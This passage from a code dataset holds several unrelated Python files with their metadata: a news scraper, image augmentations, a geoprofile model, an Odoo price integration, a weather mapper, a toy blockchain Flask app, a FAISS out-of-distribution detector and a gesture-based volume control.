QUERY,\n 'from_last': None,\n 'pagerange': PAGE_RANGE}\n return data\n\n\ndef today():\n return datetime.datetime.strftime(datetime.datetime.now(), \"%m%d%y\")\n\n\ndef save_json(data, save_fp):\n if not os.path.exists(\"./scraped_json\"):\n os.makedirs(\"./scraped_json\")\n\n with open(save_fp, 'w') as handle:\n json.dump(data, handle, indent=4,\n sort_keys=True, separators=(',', ':'))\n\n\ndef main():\n date = today()\n data = scrape_articles()\n n = len(data['articles'])\n\n save_fp = \"./scraped_json/{}_{}_{}.json\".format('buzzfeed', date, n)\n print('Saving scraped articles to {}'.format(save_fp))\n save_json(data, save_fp)\n\n\nif __name__ == \"__main__\":\n tz = pytz.utc\n PAGE_RANGE = [1, 1000]\n ELECTION_DATE = datetime.datetime(2016, 11, 9, 11, tzinfo=tz)\n QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, \\\n FROM_LAST = parse_args(parser)\n\n main()\n", "repo_name": "ddbourgin/news-scrapers", "sub_path": "buzzfeed.py", "file_name": "buzzfeed.py", "file_ext": "py", "file_size_in_byte": 8793, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.PhantomJS", "line_number": 58, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 58, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 129, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 130, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 139, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 140, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 163, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 174, "usage_type": "call"}, {"api_name": "newspaper.Article", "line_number": 199, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime.strftime", "line_number": 257, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 257, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 262, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 265, "usage_type": "call"}, {"api_name": "pytz.utc", "line_number": 280, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 282, "usage_type": "call"}]}
+{"seq_id": "29055917916", "text": "import random\nimport torchvision.transforms as transforms\n\nfrom PIL import ImageFilter, Image, ImageOps\n\n\n\nclass GaussianBlur(object):\n \"\"\"Gaussian blur augmentation in SimCLR https://arxiv.org/abs/2002.05709\"\"\"\n\n def __init__(self, sigma=[.1, 2.]):\n self.sigma = sigma\n\n def __call__(self, x):\n sigma = random.uniform(self.sigma[0], self.sigma[1])\n x = x.filter(ImageFilter.GaussianBlur(radius=sigma))\n return x\n\n\n\nmoco_aug = transforms.Compose([\n transforms.RandomResizedCrop(224, scale=(0.2, 1.)),\n transforms.RandomApply([transforms.ColorJitter(0.4, 0.4, 0.4, 0.1)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\nsimclr_aug = transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.RandomApply([transforms.ColorJitter(0.8, 0.8, 0.8, 0.2)], p=0.8),\n transforms.RandomGrayscale(p=0.2),\n transforms.RandomApply([GaussianBlur([.1, 2.])], p=0.5),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n])\n\neval_aug = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n])\n", "repo_name": "mingkai-zheng/WCL", "sub_path": "data/augmentation.py", "file_name": "augmentation.py", "file_ext": "py", "file_size_in_byte": 1511, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 30, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.uniform", "line_number": 15, "usage_type": "call"}, {"api_name": "PIL.ImageFilter.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFilter", "line_number": 16, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 25, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 25, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 26, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 26, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 27, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 27, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 31, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 31, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 33, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 33, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms.RandomGrayscale", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomApply", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 45, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 45, "usage_type": "name"}]}
+{"seq_id": "31527769676", "text": "__author__ = \"Breinbaas | Rob van Putten\"\n__copyright__ = \"Copyright 2020\"\n__credits__ = [\"Rob van Putten\"]\n__license__ = \"GPL\"\n__version__ = \"0.1.0\"\n__maintainer__ = \"Rob van Putten\"\n__email__ = \"breinbaasnl@gmail.com\"\n__status__ = \"Development\"\n\nfrom pydantic import BaseModel\nfrom typing import List\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib.patches as patches\n\nfrom .psoilprofile import PSoilprofile\nfrom .pointrd import PointRD\nfrom ..settings import HDSR_SOIL_COLORS\n\n# same here.. should (with more time) split it in some parent / child relation because\n# we are almost copying the normal Geoprofile.. so not neat, but effective for now\nclass PGeoprofile(BaseModel):\n id: str = \"\" # id van het dijktraject\n name: str = \"\" # naam van het dijktraject\n points: List[PointRD] = [] # referentielijn\n soilprofiles: List[PSoilprofile] = [] # gevonden grondprofielen\n\n @property\n def x_left(self):\n if len(self.soilprofiles) > 0:\n return min([sp.x_left for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xleft from an empty geoprofile\")\n\n @property\n def x_right(self):\n if len(self.soilprofiles) > 0:\n return max([sp.x_right for sp in self.soilprofiles])\n raise ValueError(\"Trying to get xright from an empty geoprofile\")\n\n @property\n def z_top(self) -> float:\n if len(self.soilprofiles) > 0:\n return max([sp.z_top for sp in self.soilprofiles])\n raise ValueError(\"Trying to get ztop from an empty geoprofile\")\n\n @property\n def z_bottom(self) -> float:\n if len(self.soilprofiles) > 0:\n return min([sp.z_bottom for sp in self.soilprofiles])\n raise ValueError(\"Trying to get zbottom from an empty geoprofile\")\n\n def get_xy_from_l_on_refline(self, l):\n for i in range(1,len(self.points)):\n p1 = self.points[i-1]\n p2 = self.points[i]\n\n if p1.chainage <= l and l <= p2.chainage:\n x = p1.x + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.x - p2.x)\n y = p1.y + (l - p1.chainage) / (p2.chainage - p1.chainage) * (p1.y - p2.y)\n return x, y\n\n raise ValueError(f\"Could not find xy for chainage {l}; min chainage = {self.points[0].chainage}, max chainage = {self.points[-1].chainage}\")\n \n \n def get_partial_refline(self, chainage_start: int, chainage_end: int):\n result = []\n points = np.linspace(chainage_start, chainage_end, int((chainage_end - chainage_start) / 10.) + 1)\n for p in points:\n result.append(self.get_xy_from_l_on_refline(p))\n\n return result\n\n \n def to_dam_input(self, segmentid: int, shapeinput) -> int:\n pass\n \n def plot(self, filename: str) -> None:\n pass", "repo_name": "breinbaas/geoprofielen", "sub_path": "geoprofielen/objects/pgeoprofile.py", "file_name": "pgeoprofile.py", "file_ext": "py", "file_size_in_byte": 2853, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pydantic.BaseModel", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "pointrd.PointRD", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "psoilprofile.PSoilprofile", "line_number": 28, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "708504241", "text": "from odoo import models, api\r\nfrom urllib.request import urlopen\r\nfrom xml.dom.minidom import parseString\r\nimport json\r\nfrom urllib.parse import urlencode\r\nfrom odoo.exceptions import Warning\r\n\r\n\r\nclass GAProductIntegration(models.Model):\r\n _inherit = 'sale.order.line'\r\n\r\n @api.multi\r\n @api.onchange('product_id')\r\n def product_uom_change(self):\r\n\r\n if self.product_id:\r\n if self.product_id.default_code:\r\n #super(GAProductIntegration, self).product_id_change()\r\n res = super(GAProductIntegration, self).product_uom_change()\r\n data = {'ItemCode': self.product_id.default_code, 'Zone': self.order_id.partner_id.zone_id.code}\r\n url = \"http://sap.stile.com.pk/api/api/demo?\"\r\n content = urlopen(url + urlencode(data)).read()\r\n self.price_unit = parseString(json.loads(str(content, 'utf-8'))).getElementsByTagName('Price')[0].childNodes[0].data\r\n return res\r\n\r\n GAProductIntegration()\r\n\r\n", "repo_name": "MuhammadFaizan1996/abc", "sub_path": "GA_SAP_Integration/model/product.py", "file_name": "product.py", "file_ext": "py", "file_size_in_byte": 1027, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "odoo.models.Model", "line_number": 9, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 9, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 22, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 22, "usage_type": "call"}, {"api_name": "xml.dom.minidom.parseString", "line_number": 23, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 12, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 12, "usage_type": "name"}, {"api_name": "odoo.api.onchange", "line_number": 13, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 13, "usage_type": "name"}]}
+{"seq_id": "21015265862", "text": "import time\nfrom data.utils.indicator_mapper import Indicator_Data_Map\nfrom data.current_conditions import NOAA_Current_Observation\n\n\nclass Current_Obs_Mapper(Indicator_Data_Map):\n \"\"\" Mapper for current observation from NOAA \"\"\"\n\n def __init__(self, station):\n\n self._noaa_current_obs = NOAA_Current_Observation(station)\n self.init()\n\n self[\"icon_name\"] = \"sunny\"\n self[\"icon_color\"] = \"#FFFF00\"\n self[\"line1\"] = self.temp_str\n self[\"line2\"] = lambda: time.strftime(\n \"%I:%M\", time.localtime()).lstrip(\"0\")\n self[\"line3\"] = lambda: self._noaa_current_obs[\"weather\"]\n\n def temp_str(self):\n \"\"\"\n Returns the temperature with decimal point dropped\n \"\"\"\n\n try:\n temp = \"%iF\" % int(float(self._noaa_current_obs[\"temp_f\"]))\n except:\n temp = \"\"\n\n return temp\n", "repo_name": "mattgrogan/ledmatrix", "sub_path": "ledmatrix/data/mappers/current_obs.py", "file_name": "current_obs.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data.utils.indicator_mapper.Indicator_Data_Map", "line_number": 6, "usage_type": "name"}, {"api_name": "data.current_conditions.NOAA_Current_Observation", "line_number": 11, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 17, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "29253380165", "text": "import os\nimport random\nimport requests\n\nfrom flask import Flask, jsonify, request\n\nfrom backend.blockchain.blockchain import Blockchain\nfrom backend.pubsub import PubSub\nfrom backend.wallet.wallet import Wallet\nfrom backend.wallet.transaction import Transaction\nfrom backend.wallet.transaction_pool import TransactionPool\n\napp = Flask(__name__)\n\nblockchain = Blockchain()\nwallet = Wallet(blockchain)\ntransaction_pool = TransactionPool()\npubsub = PubSub(blockchain, transaction_pool)\n\n\n@app.route(\"/\")\ndef route_default():\n return \"Welcom to the Blockchain\"\n\n\n@app.route(\"/blockchain/\")\ndef route_blockchain():\n return jsonify(blockchain.to_json())\n\n\n@app.route(\"/blockchain/mine/\")\ndef route_blockchain_mine():\n blockchain.add_block(transaction_pool.transaction_data())\n block = blockchain.chain[-1]\n\n pubsub.brodcast_block(block)\n\n transaction_pool.clear_blockchain_transactions(blockchain)\n\n return jsonify(block.to_json())\n\n\n@app.route(\"/wallet/transact/\", methods=['POST'])\ndef route_wallet_transact():\n transaction_data = request.get_json()\n transaction = transaction_pool.existing_transaction(wallet.address)\n if transaction:\n transaction.update(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n else:\n transaction = Transaction(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n\n # print(f'transaction.to_json(): {transaction.to_json()}')\n pubsub.brodcast_transaction(transaction)\n\n return jsonify(transaction.to_json())\n\n\n@app.route(\"/wallet/info/\")\ndef route_wallet_info():\n return jsonify(\n {'address': wallet.address, 'balance': wallet.balance}\n )\n\n\nROOT_PORT = 8000\nPORT = ROOT_PORT\n\nif os.environ.get(\"PEER\") == \"True\":\n\n PORT = random.randint(5000, 7000)\n result = requests.get(f\"http://localhost:{ROOT_PORT}/blockchain/\")\n print(f\"Result in json: {result.json()}\")\n\n result_blockchain = Blockchain.from_json(result.json())\n try:\n blockchain.replace_chain(result_blockchain.chain)\n print(\"-- Successfully syncronized the local chain\")\n except Exception as e:\n print(f\"\\n -- Error syncronizing: {e}\")\n\napp.run(port=PORT, debug=False)\n", "repo_name": "amitgit712/python-blockchain", "sub_path": "backend/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 15, "usage_type": "call"}, {"api_name": "backend.wallet.wallet.Wallet", "line_number": 16, "usage_type": "call"}, {"api_name": "backend.wallet.transaction_pool.TransactionPool", "line_number": 17, "usage_type": "call"}, {"api_name": "backend.pubsub.PubSub", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "backend.wallet.transaction.Transaction", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 76, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 76, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain.from_json", "line_number": 82, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 82, "usage_type": "name"}]}
+{"seq_id": "22935573536", "text": "#!/usr/bin/env python\n#\n# Author: Daniela Duricekova \n#\n\nimport multiprocessing\n\n\nNUMS = list(range(25, 33))\n\n\ndef fib(n):\n if n <= 1:\n return 1\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef n_fib(n, results):\n results.put((n, fib(n)))\n\n\nif __name__ == '__main__':\n results = multiprocessing.Queue()\n processes = []\n for n in NUMS:\n p = multiprocessing.Process(target=n_fib, args=(n, results))\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()\n\n for _ in range(len(NUMS)):\n print(results.get())\n", "repo_name": "sopticek/blog", "sub_path": "2017-05-13-concurrent-and-parallel-programming-in-python-part-1/multiprocessing_no_inheritance.py", "file_name": "multiprocessing_no_inheritance.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "multiprocessing.Queue", "line_number": 24, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "10089626488", "text": "import os\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\nimport argparse\r\nimport numpy as np\r\n# See installation guide for FAISS here: https://github.com/facebookresearch/faiss/blob/main/INSTALL.md\r\nimport faiss\r\nimport metrics\r\n\r\nparser = argparse.ArgumentParser(description=\"OOD Detection for Audio\")\r\n\r\nparser.add_argument(\"--ind_dataset\", \r\n default=\"mswc_en\", type=str,\r\n help=\"in-distribution dataset name\")\r\n\r\nparser.add_argument(\"--ood_dataset\", \r\n default=\"vocalsound\", type=str,\r\n help=\"out-of-distribution dataset name\")\r\n\r\nparser.add_argument(\"--models_dir\", \r\n default=\"./models/\", type=str,\r\n help=\"models directory path\")\r\n\r\nparser.add_argument(\"--features_dir\", \r\n default=\"./features/\", type=str, \r\n help=\"features directory path\")\r\n\r\nparser.add_argument(\"--k\", \r\n default=5, type=int, \r\n help=\"number of nearest neighbors for ood\")\r\n\r\nargs = parser.parse_args()\r\n\r\ndef run_deep_knn_ood(args):\r\n features_path = os.path.join(args.features_dir,\r\n f\"{args.ind_dataset}_yamnet\")\r\n \r\n tr_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_train_features.npy\"))\r\n ts_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_test_features.npy\"))\r\n ts_ood_feat = np.load(os.path.join(features_path, \r\n f\"{args.ood_dataset}_ood_test_features.npy\")) \r\n\r\n normalizer = lambda x: x / (np.linalg.norm(x, \r\n ord=2, axis=-1, keepdims=True) + 1e-10)\r\n tr_ind_feat = normalizer(tr_ind_feat) \r\n ts_ind_feat = normalizer(ts_ind_feat)\r\n ts_ood_feat = normalizer(ts_ood_feat)\r\n\r\n index = faiss.IndexFlatL2(tr_ind_feat.shape[1])\r\n index.add(tr_ind_feat)\r\n ind_D, _ = index.search(ts_ind_feat, args.k)\r\n ind_scores = -ind_D[:,-1]\r\n ood_D, _ = index.search(ts_ood_feat, args.k)\r\n ood_scores = -ood_D[:,-1]\r\n\r\n results = metrics.get_measures(\r\n ind_scores, ood_scores, \r\n recall_level = 0.95)\r\n fpr95 = results[\"FPR\"]\r\n auroc = results[\"AUROC\"]\r\n print(f\"FPR95: {fpr95} | AUROC: {auroc}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_deep_knn_ood(args)", "repo_name": "Zaharah/ood_audio", "sub_path": "run_ood.py", "file_name": "run_ood.py", "file_ext": "py", "file_size_in_byte": 2123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "faiss.IndexFlatL2", "line_number": 51, "usage_type": "call"}, {"api_name": "metrics.get_measures", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "71664090729", "text": "import cv2\nimport mediapipe as mp\nimport time\nimport numpy as np\nimport hand_tracker as ht\n\n\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\ndevices = AudioUtilities.GetSpeakers()\ninterface = devices.Activate(\n IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\nvolume = cast(interface, POINTER(IAudioEndpointVolume))\n\nvolume.GetVolumeRange()\nvolRnge = volume.GetVolumeRange()\nmaxvol =volRnge[1]\nminvol = volRnge[0]\n\ncap = cv2.VideoCapture(0)\nprint(minvol)\nptime = 0\nvolbar = -65.25\ndetector = ht.hand_detector(detection_confidence=0.75)\nwhile True:\n success, img = cap.read()\n img = cv2.flip(img,1)\n ctime = time.time()\n fps = 1/(ctime - ptime)\n ptime = ctime\n cv2.putText(img,f\"FPS : {int(fps)}\",(10,80),cv2.FONT_HERSHEY_COMPLEX,1,(0,0,0),2)\n detector.hand_detection(img)\n lmlis = detector.findposition(img,draw = False)\n if len(lmlis) != 0:\n\n x , y = lmlis[4][1] , lmlis[4][2]\n x1 , y1 = lmlis[8][1], lmlis[8][2]\n cx, cy = (x+x1)//2,(y+y1)//2\n length = np.hypot(x1 - x,y1-y)\n vol = np.interp(length,[30,110],[minvol,maxvol])\n volbar = np.interp(vol,[minvol,maxvol],[400,150])\n volper = np.interp(vol,[minvol,maxvol],[0,100])\n volume.SetMasterVolumeLevel(vol, None)\n\n cv2.circle(img,(x , y),8,(0,255,0),-1)\n cv2.circle(img,(x1 , y1),8,(0,255,0),-1)\n cv2.circle(img,(cx , cy),8,(0,255,0),-1)\n \n cv2.line(img,(x,y),(x1,y1),(0,255,0),2)\n cv2.rectangle(img,(150,150),(85,400),(0,125,0))\n cv2.rectangle(img,(150,int(volbar)),(85,400),(0,125,0),-1)\n cv2.putText(img,f\"{int(volper)}%\",(30,150),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,0,255),1)\n\n if length < 35:\n cv2.circle(img,(cx , cy),8,(0,0,255),-1)\n\n \n\n\n\n\n\n\n\n\n cv2.imshow(\"Image\",img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n \n\n ", "repo_name": "Joelthomas62384/ai-computer-vision", "sub_path": "gesture_volume.py", "file_name": "gesture_volume.py", "file_ext": "py", "file_size_in_byte": 1937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pycaw.pycaw.AudioUtilities.GetSpeakers", "line_number": 11, "usage_type": "call"}, {"api_name": "pycaw.pycaw.AudioUtilities", "line_number": 11, "usage_type": "name"}, {"api_name": "comtypes.CLSCTX_ALL", "line_number": 13, "usage_type": "argument"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume._iid_", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 13, "usage_type": "name"}, {"api_name": "ctypes.cast", "line_number": 14, "usage_type": "call"}, {"api_name": "ctypes.POINTER", "line_number": 14, "usage_type": "call"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 14, "usage_type": "argument"}, {"api_name": "cv2.VideoCapture", "line_number": 21, "usage_type": "call"}, {"api_name": "hand_tracker.hand_detector", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.hypot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 68, "usage_type": "call"}]}
+{"seq_id": "41521044463", "text": "import requests\nimport sys\ndef test(url_test):\n payload={'page':'1','count':'2'}\n urltest=url_test\n req=requests.post(urltest,data=payload, verify=False)\n print(req.url)\n print(type(req.text))\n\n print(type(req.json()))\n\n print(req.headers)\n\nurlname=sys.argv[1]\n\ntest(urlname)\n# test_url=\"https://api.github.com/repos/clairyin/homework/contents\"\n# win_url=\"J:/xew1.txt\"\n# with open(win_url, 'rb') as f:\n# print(f.readlines())\n# def get_git():\n#\n# req=requests.get(test_url)\n# #print(req.text)\n# print(req.json())\n#\n# file = open(win_url, 'rb')\n# files = {'file': file}\n# requests.post(test_url,)\n# get_git()", "repo_name": "clairyin/homework", "sub_path": "yaoxuechuan/homework01.py", "file_name": "homework01.py", "file_ext": "py", "file_size_in_byte": 658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 6, "usage_type": "call"}, {"api_name": 